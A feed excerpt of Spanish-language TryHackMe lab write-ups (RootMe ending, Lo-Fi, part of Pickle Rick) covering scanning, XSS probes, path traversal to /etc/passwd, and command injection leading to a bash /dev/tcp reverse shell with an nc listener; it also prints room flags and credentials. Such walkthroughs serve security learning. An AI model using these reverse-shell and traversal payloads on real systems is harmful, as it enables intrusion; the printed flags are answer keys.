&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flcuujcb12p4a5r71uy42.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flcuujcb12p4a5r71uy42.png" alt="Image description" width="800" height="252"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Lo introducimos y con un &lt;code&gt;whoami&lt;/code&gt; confirmamos que somos &lt;code&gt;root&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe0kd00enfsneqqwpb5th.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe0kd00enfsneqqwpb5th.png" alt="Image whoami root" width="800" height="70"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Finalmente, utilizamos &lt;code&gt;find / -name root.txt&lt;/code&gt; para encontrar la ruta del archivo para, posteriormente, abrirlo con un &lt;code&gt;cat&lt;/code&gt; y obtener la última flag.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftfl6x8908oonsdv2801m.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftfl6x8908oonsdv2801m.png" alt="Image Final" width="561" height="135"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Y así resolvemos la máquina &lt;a href="https://tryhackme.com/room/rrootme" rel="noopener noreferrer"&gt;RootMe&lt;/a&gt; de TryhackMe.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>pentesting</category>
      <category>beginners</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>Lo-Fi | TryHackMe | Spanish</title>
      <dc:creator>C4rnotaurus</dc:creator>
      <pubDate>Thu, 17 Apr 2025 06:32:11 +0000</pubDate>
      <link>https://dev.to/c4s/lo-fi-tryhackme-spanish-11gh</link>
      <guid>https://dev.to/c4s/lo-fi-tryhackme-spanish-11gh</guid>
      <description>&lt;p&gt;Luego de conectarse a la máquina y ver que efectivamente tenemos conexión con aquello, hacemos un escaneo con Nmap &lt;code&gt;nmap -Pn -n --open --top-ports 10000 -T5 -sVC [IP obejetivo]&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff3qpqkuqns8ro4bh644s.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff3qpqkuqns8ro4bh644s.png" alt="Image Nmap" width="800" height="307"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Está el puerto 80 abierto, así que abriremos el navegador para ver la página.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv5ckx5q4q4l5hexvf621.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv5ckx5q4q4l5hexvf621.png" alt="Image Página" width="800" height="443"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Vemos que tenemos un «buscador», lo primero que se me ocurre es ver si es vulnerable a &lt;code&gt;XSS&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwukwpq474tlcw6ouc19q.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwukwpq474tlcw6ouc19q.png" alt="Image XSS" width="404" height="163"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Al parecer no, tanto &lt;code&gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&lt;/code&gt; como &lt;code&gt;&amp;lt;img src=x onerror=alert(1)&amp;gt;&lt;/code&gt; no hacen aparecer la alerta, por lo tanto, no es vulnerable a &lt;code&gt;XSS&lt;/code&gt;. &lt;/p&gt;

&lt;p&gt;Navegando por la página, voy a la sección &lt;code&gt;relax&lt;/code&gt; y podemos ver que la página se mueve con el parámetro &lt;code&gt;page&lt;/code&gt; así que intentaremos &lt;code&gt;Path traversal&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F135i8otutctbdpe62dk5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F135i8otutctbdpe62dk5.png" alt="Image Path1" width="316" height="47"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Introduzco un &lt;code&gt;index.php&lt;/code&gt; para saber si el servidor no está bloqueando o sanitizando archivos conocidos, si falla o da un error, se podría inferir que hay restricciones (como una lista blanca de archivos permitidos) o que el parámetro page no funciona como pensábamos, esto ayuda a evitar falsos negativos al probar &lt;code&gt;payloads&lt;/code&gt; más avanzados. Pero en este caso sí funciona.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fleszkkvpcd0ta3tfkmvr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fleszkkvpcd0ta3tfkmvr.png" alt="Image index" width="800" height="566"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Intentaremos &lt;code&gt;/etc/passwd&lt;/code&gt;, pero nos suelta un aviso.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F99fc1q1epvr1mwqzjzra.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F99fc1q1epvr1mwqzjzra.png" alt="Image aviso" width="800" height="425"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Así que utilizamos &lt;code&gt;../../../etc/passwd&lt;/code&gt; el cual nos revela el contenido.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5zbn751hf1pimj088mgw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5zbn751hf1pimj088mgw.png" alt="Image passwd " width="800" height="368"&gt;&lt;/a&gt;&lt;/p&gt;










&lt;p&gt;PD: Esto también se puede realizar con herramientas para automatizar la búsqueda, pero en las pruebas que utilice &lt;code&gt;ffuf&lt;/code&gt; y &lt;code&gt;gobuster&lt;/code&gt; me dio muchos falsos-positivos, como podemos ver, utilizando un diccionario de &lt;code&gt;Path traversal&lt;/code&gt;, en la mayoría me daba el mensaje de que no existía, así que la mejor opción es hacerlo manual en este caso.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvn732dczp2hg83176c0i.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvn732dczp2hg83176c0i.png" alt="Image ffuf" width="800" height="232"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F15lj2fsuofaeg9kbd9j0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F15lj2fsuofaeg9kbd9j0.png" alt="Image falsoP" width="800" height="21"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5dr841gun0ve62ze4ung.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5dr841gun0ve62ze4ung.png" alt="Image falso" width="800" height="382"&gt;&lt;/a&gt;&lt;/p&gt;










&lt;p&gt;Ahora nos toca encontrar la bandera, podríamos buscarlo en &lt;code&gt;/root/flag.txt&lt;/code&gt;, pero dice que no existe.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fovqz5bvr2avtyklap0la.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fovqz5bvr2avtyklap0la.png" alt="Image root" width="800" height="415"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Buscamos en la ruta de &lt;code&gt;/home/&lt;/code&gt; Pero este no nos devuelve nada.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftkapzrrvqwd9uk93yt4n.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftkapzrrvqwd9uk93yt4n.png" alt="Image description" width="800" height="371"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Intentemos buscar la &lt;code&gt;flag&lt;/code&gt; en la carpeta raíz &lt;code&gt;/flag.txt&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo4rr9wxr4ezt1hsgv01j.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo4rr9wxr4ezt1hsgv01j.png" alt="Image flag real" width="800" height="409"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Efectivamente, estaba aquí la &lt;code&gt;flag{e4478e0eab69bd642b8238765dcb7d18}&lt;/code&gt;.&lt;/p&gt;




&lt;p&gt;Y así resolvimos la máquina &lt;a href="https://tryhackme.com/room/lofi" rel="noopener noreferrer"&gt;Lo-Fi&lt;/a&gt; de TryHackMe.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>pentesting</category>
      <category>beginners</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>Pickle Rick | TryHackMe | Spanish</title>
      <dc:creator>C4rnotaurus</dc:creator>
      <pubDate>Wed, 16 Apr 2025 05:09:53 +0000</pubDate>
      <link>https://dev.to/c4s/pickle-rick-tryhackme-4afe</link>
      <guid>https://dev.to/c4s/pickle-rick-tryhackme-4afe</guid>
      <description>&lt;p&gt;Luego de conectarse a la máquina y ver que efectivamente tenemos conexión con aquello, hacemos un escaneo con Nmap &lt;code&gt;nmap -Pn -n --open --top-ports 10000 -T5 -sVC [IP obejetivo]&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcmsalm8zumdaq3xk6knh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcmsalm8zumdaq3xk6knh.png" alt="Image Nmap" width="800" height="312"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Podemos ver que hay levantado un Apache en el puerto 80, por lo cual ponemos la [IP objetiva] en el navegador y nos lleva a la siguiente página.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffbarsppa77ykz068a7tl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffbarsppa77ykz068a7tl.png" alt="Image Página" width="800" height="362"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Al abrir el código fuente y revisarlo, nos encontramos con el siguiente Username &lt;code&gt;R1ckRul3s&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5nl6npb54mm9da8dx3oq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5nl6npb54mm9da8dx3oq.png" alt="Image User" width="264" height="57"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Hacemos Fuzzing de la IP objetiva con &lt;code&gt;gobuster dir -u [IP objetivo]  -w [Ruta_diccionario]  -x php,html,txt&lt;/code&gt; el cual nos suelta los siguientes directorios con &lt;code&gt;status 200&lt;/code&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;/index.php&lt;/li&gt;
&lt;li&gt;/login.php&lt;/li&gt;
&lt;li&gt;/assests&lt;/li&gt;
&lt;li&gt;/porta.php&lt;/li&gt;
&lt;li&gt;/robots.txt&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Observamos que hay un &lt;code&gt;txt&lt;/code&gt; así que procedemos a verlo.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft031nhkw1gvl821c1n8w.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft031nhkw1gvl821c1n8w.png" alt="Image robots.txt" width="569" height="196"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Vemos que nos dice &lt;code&gt;Wubbalubbadubdub&lt;/code&gt;, lo guardaremos para después. Luego entramos al &lt;code&gt;/login.php&lt;/code&gt; el cual nos pide &lt;code&gt;user&lt;/code&gt; y &lt;code&gt;passwd&lt;/code&gt;, el user ya lo tenemos &lt;code&gt;R1ckRul3s&lt;/code&gt;, dado en el &lt;code&gt;codigo fuente&lt;/code&gt;, con la palabra anterior que encontramos, en &lt;code&gt;robots.txt&lt;/code&gt;, la introducimos en el password y... En efecto, entramos.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fonf0mba3s06bhtxu9ce1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fonf0mba3s06bhtxu9ce1.png" alt="Image Panel command" width="800" height="290"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Hay un panel que nos da cabida a introducir comandos, ¿Pero de cuáles? Primero veremos si se puede introducir &lt;code&gt;scripts XSS&lt;/code&gt;... se intentó varios, pero no resulto, ahora veremos si los comandos de Linux son efectivos.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1w6ls90yapmb3mhhdjcd.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1w6ls90yapmb3mhhdjcd.png" alt="Image ls" width="800" height="283"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Tal parece que si lo son, ya que con &lt;code&gt;ls&lt;/code&gt; nos lista el contenido. Vemos quienes somos con &lt;code&gt;id&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fml1aeqo6c2ew56q9y539.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fml1aeqo6c2ew56q9y539.png" alt="Image id" width="800" height="187"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Somos &lt;code&gt;www-data&lt;/code&gt; y nos confirma que no tenemos ningún privilegio root.&lt;/p&gt;

&lt;p&gt;Al introducir el comando &lt;code&gt;cat&lt;/code&gt; nos da un mensaje de que está deshabilitado, por lo tanto, usaremos uno similar &lt;code&gt;less&lt;/code&gt; y abriremos &lt;code&gt;Sup3rS3cretPickl3Ingred.txt&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8zirnlje82awyzae6mqt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8zirnlje82awyzae6mqt.png" alt="Image contenido del archivo" width="800" height="209"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;El archivo contiene &lt;code&gt;mr. meeseek hair&lt;/code&gt;, puede ser la primera flag... Al introducirlo en la primera preguntan, en efecto, es la respuesta.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F19d2p7a2x69d8h5s3it8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F19d2p7a2x69d8h5s3it8.png" alt="Image Respuesta 1" width="800" height="112"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;clue.txt&lt;/code&gt; nos dice que busquemos en los demás directorios.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;robots.txt&lt;/code&gt; contiene la passwd que encontramos antes.&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;El comando &lt;code&gt;ls /&lt;/code&gt; nos lleva al directorio raíz e intentamos abrir el archivo &lt;code&gt;/root&lt;/code&gt;, pero nos dice que no tenemos permiso.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F45ju5ua32dhlymuap1fm.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F45ju5ua32dhlymuap1fm.png" alt="Image carpeta raíz" width="800" height="400"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Vamos a hacer una Shell reverse para poder tener mejor visibilidad, buscamos &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#tools" rel="noopener noreferrer"&gt;Aquí&lt;/a&gt; vemos un &lt;code&gt;bash TCP&lt;/code&gt; &lt;code&gt;bash -i &amp;gt;&amp;amp; /dev/tcp/10.0.0.1/4242 0&amp;gt;&amp;amp;1&lt;/code&gt; en Reverse Shell.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F854cjcbkzkxcc9y777at.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F854cjcbkzkxcc9y777at.png" alt="Image reverse shell" width="800" height="315"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Procedemos a modificarla para que funcione con nuestra interfaz, cambiamos la [IP] que trae por la nuestra que es la de OpenVPN.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2u6vcar7tfga6sgmxmzc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2u6vcar7tfga6sgmxmzc.png" alt="Image OpenVPN " width="800" height="94"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Entonces sería: &lt;br&gt;
&lt;code&gt;bash -c 'bash -i &amp;gt;&amp;amp; /dev/tcp/10.2.46.4/1337 0&amp;gt;&amp;amp;1'&lt;/code&gt; en nuestro caso, solo cambiando la [IP] y el [Puerto] para escuchar luego con &lt;code&gt;nc -lnvp 1337&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkozscawzxk692u2snn61.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkozscawzxk692u2snn61.png" alt="Image escucha" width="377" height="98"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Ponemos el comando &lt;code&gt;bash -c 'bash -i &amp;gt;&amp;amp; /dev/tcp/10.2.46.4/1337 0&amp;gt;&amp;amp;1'&lt;/code&gt; en la página y... Entramos.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpfogdbo6dhkt0jxi2hzh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpfogdbo6dhkt0jxi2hzh.png" alt="Image reverse exitoso" width="800" height="315"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Entramos al directorio &lt;code&gt;/home/rick&lt;/code&gt; y vemos que hay un archivo llamado &lt;code&gt;second ingredients&lt;/code&gt;, lo abrimos con &lt;code&gt;cat 'second ingredients'&lt;/code&gt; y nos da &lt;code&gt;1 jerry tear&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnin5oxf6xujtkrq08ey3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnin5oxf6xujtkrq08ey3.png" alt="Image ingrediente" width="753" height="316"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;luego vamos a las questions a confirmar.&lt;/p&gt;

